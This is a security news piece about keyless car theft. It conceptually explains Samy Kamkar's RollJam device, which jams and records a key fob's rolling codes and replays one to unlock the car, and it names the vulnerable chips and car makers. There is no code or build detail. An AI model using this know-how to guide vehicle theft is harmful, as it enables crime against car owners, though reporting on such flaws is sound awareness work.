“This guy is a professional, it’s sophisticated. It’s something that has been organised. It’s not your everyday car theft.” said Mr Beacham, the manager of the dealership. “We never heard anything and only realised an hour later … that the car was missing.” “The CCTV shows him speeding off down Great South Rd in broad daylight.

Unfortunately, such kind of hack seems to very common, hackers are using devices that are designed to deceive the authentication process implemented by wireless car.

These devices act as a jamming device and are also able to capture legitimate signals sent by the owner of the vehicle when he tries to unlock the car.

To better understand how these devices work, let me introduce you the RollJam, a cheap device designed by the popular hacker Samy Kamkar, composed of a microcontroller and a battery. RollJam is capable unlocking any car or garage door, it is easy to use and costs under $30.

RollJam exploits security vulnerabilities in the wireless unlocking technology that is currently implemented by the majority of car manufacturers.
Keyless cars thefts is rising 1

Keyless entry systems allow car owners to unlock the vehicle remotely within a range of 20 meters.
RollJam was designed to steal the secret codes, also known as Rolling Code, that is generated by Keyless entry systems when the car owner presses the unlock or lock button on his wireless key. The Rolling code is a one-time code randomly generated and sent over a radio frequency to the car when the car owner presses the button of its key fob.

When the Rolling code is used the car generates a new one to use for the next time.

How does RollJam work?

The principle is simple, when the car owner presses the key fob to unlock the car, RollJam used its radio frequency to block the signal and then records it.

The car will never receive the code and the car owner likely will press the button again. When the button is pressed the second time, the RollJam again jams the signal and record also this second code, meantime it reply to the challenge mechanism by providing the first code it intercepted, unlocking the car.

When the victim parks the vehicle in his/her car, you can use that stolen signal to unlock the car. “Because I jammed two signals,” Kamkar said, “I still have one that I can use in the future.”

The RollJam works on several cars, Kamkar discovered that the attack works against widely adopted chips, including the High-Security Rolling Code Generator made by National Semiconductor and the KeeLoq access control system from Microchip Technology.

Among the car makers vulnerable to the RollJam device there are Chrysler, Fiat, Honda, Toyota, Daewoo, GM, Volvo, Volkswagen Group, and Jaguar.